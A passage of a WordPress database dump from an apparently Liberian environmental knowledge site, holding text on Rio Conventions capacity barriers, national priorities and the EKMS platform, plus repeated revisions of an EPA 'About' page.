obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).&nbsp;</p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.&nbsp;</p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.&nbsp;</p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.&nbsp;</p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>\n<h2>What does the EKMS include?</h2>\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->\n\n<h2>Acknowledgement</h2>\n<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>\n<h2>Disclaimer</h2>\n<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-14 06:43:27','2019-11-14 06:43:27','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2047,1,'2019-11-14 06:52:18','2019-11-14 06:52:18','The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,400px,450px,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 06:52:18','2019-11-14 06:52:18','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2051,1,'2019-11-14 06:58:48','2019-11-14 06:58:48','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 06:58:48','2019-11-14 06:58:48','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2052,1,'2019-11-14 06:59:56','2019-11-14 06:59:56','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 06:59:56','2019-11-14 06:59:56','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2055,1,'2019-11-14 07:06:55','2019-11-14 07:06:55','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,300px,450px,auto,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 07:06:55','2019-11-14 07:06:55','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2056,1,'2019-11-14 07:08:35','2019-11-14 07:08:35','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 07:08:35','2019-11-14 07:08:35','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2057,1,'2019-11-14 07:24:21','2019-11-14 07:24:21','[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"400px,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-14 07:24:21','2019-11-14 07:24:21','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2058,1,'2019-11-14 07:25:19','2019-11-14 07:25:19','[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-14 07:25:19','2019-11-14 07:25:19','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2063,1,'2019-11-14 08:50:59','2019-11-14 08:50:59','This Climate Change Gender Action Plan (ccGAP) for Liberia was prepared based on the desk review of key reports, publications and websites, surveys and interviews, in-country meetings, stakeholder consultation and research, among others.\r\n\r\nThe development of this document was made possible largely due to the generous financial support received from the Government of Finland. Their visionary leadership has built the necessary momentum for a global paradigm shift in our understanding of the importance of gender in climate change negotiations and initiatives globally, and for the betterment of the lives of women around the world.','Climate Change Gender Action Plan','','publish','closed','closed','','climate-change-gender-action-plan-for-the-government-of-liberia','','','2022-05-20 10:19:45','2022-05-20 10:19:45','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2063',146,'document','',0),(2064,1,'2019-11-14 08:49:38','2019-11-14 08:49:38','','2012_IUCN_Climate-Change-Gender-Action-Plan-Liberia','','inherit','open','closed','','2012_iucn_climate-change-gender-action-plan-liberia','','','2019-11-14 08:49:38','2019-11-14 08:49:38','',2063,'https://ekmsliberia.info/wp-content/uploads/2019/11/2012_IUCN_Climate-Change-Gender-Action-Plan-Liberia.pdf',0,'attachment','application/pdf',0),(2065,1,'2019-11-14 11:34:39','2019-11-14 11:34:39','This Climate Change Gender Action Plan (ccGAP) for Liberia was prepared based on the desk review of key reports, publications and websites, surveys and interviews, in-country meetings, stakeholder consultation and research, among others.\nThe development of this document was made possible largely due to the generous financial support received from the Government of\nFinland. Their visionary leadership has\nbuilt the necessary momentum for a global\nparadigm shift in our understanding of the\nimportance of gender in climate change\nnegotiations and initiatives globally, and for\nthe betterment of the lives of women around\nthe world.','Climate Change Gender Action Plan','','inherit','closed','closed','','2063-autosave-v1','','','2019-11-14 11:34:39','2019-11-14 11:34:39','',2063,'https://ekmsliberia.info/2063-autosave-v1/',0,'revision','',0),(2067,1,'2019-11-14 11:56:22','2019-11-14 11:56:22','','Environmental Protection Agency','','inherit','closed','closed','','975-revision-v1','','','2019-11-14 11:56:22','2019-11-14 11:56:22','',975,'https://ekmsliberia.info/975-revision-v1/',0,'revision','',0),(2072,1,'2019-11-14 12:30:43','2019-11-14 12:30:43','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n		<p>Coming up</p>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 12:30:43','2019-11-14 12:30:43','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2073,1,'2019-11-14 12:32:15','2019-11-14 12:32:15','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural 